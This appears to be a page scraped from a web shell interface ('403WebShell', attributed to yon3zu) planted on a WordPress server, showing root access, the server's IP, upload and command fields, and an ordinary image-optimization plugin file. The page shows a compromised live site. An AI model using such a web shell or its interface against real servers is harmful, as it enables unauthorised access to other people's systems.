Uname:Linux machinox-server 6.17.0-1013-aws #13~24.04.1-Ubuntu SMP Fri Apr 24 21:36:58 UTC 2026 aarch64

Base Dir : /var/www/machinox.in

User : root


403WebShell
403Webshell
Server IP : 13.235.167.51  /  Your IP : 216.73.217.116
Web Server : Apache
System : Linux machinox-server 6.17.0-1013-aws #13~24.04.1-Ubuntu SMP Fri Apr 24 21:36:58 UTC 2026 aarch64
User : root ( 0)
PHP Version : 8.2.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/machinox.in/wp-content/plugins/image-optimization/modules/connect-manager/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/machinox.in/wp-content/plugins/image-optimization/modules/connect-manager/module.php
<?php

namespace ImageOptimization\Modules\ConnectManager;

use ImageOptimization;
use ImageOptimization\Classes\{
	Module_Base,
};

use ImageOptimization\Modules\ConnectManager\Classes\Connect_Runner;

use ImageOptimization\Modules\ConnectManager\Components\Legacy_Connect;
use ImageOptimization\Modules\ConnectManager\Components\Connect;

use ImageOptimization\Plugin;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

/**
 * Class Module
 */
class Module extends Module_Base {

	/**
	 * Connect instance
	 *
	 * @var connect_instance
	 */
	public $connect_instance;

	/**
	 * Get module name.
	 * Retrieve the module name.
	 * @access public
	 * @return string Module name.
	 */
	public function get_name() {
		return 'connect-manager';
	}

	/**
	 * component_list
	 * @return string[]
	 */
	public static function component_list() : array {
		return [
			'Legacy_Connect',
			'Connect',
		];
	}

	public function __construct() {
		// Register components.
		$this->register_components();
		// Load Connect Manager.
		add_action( 'plugins_loaded', [ $this, 'load_connect_manager' ] );
	}

	/**
	 * Load Connect Manager
	 *
	 * Load the correct version of Connect Manager based on whether
	 * the user is already connected using legacy version or not.
	 *
	 * @return void
	 */
	public function load_connect_manager() {

		if ( ImageOptimization\Modules\Connect\Module::is_active() ) {
			$this->connect_instance = new Connect_Runner( new Connect() );
		} else {
			$this->connect_instance = new Connect_Runner( new Legacy_Connect() );
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit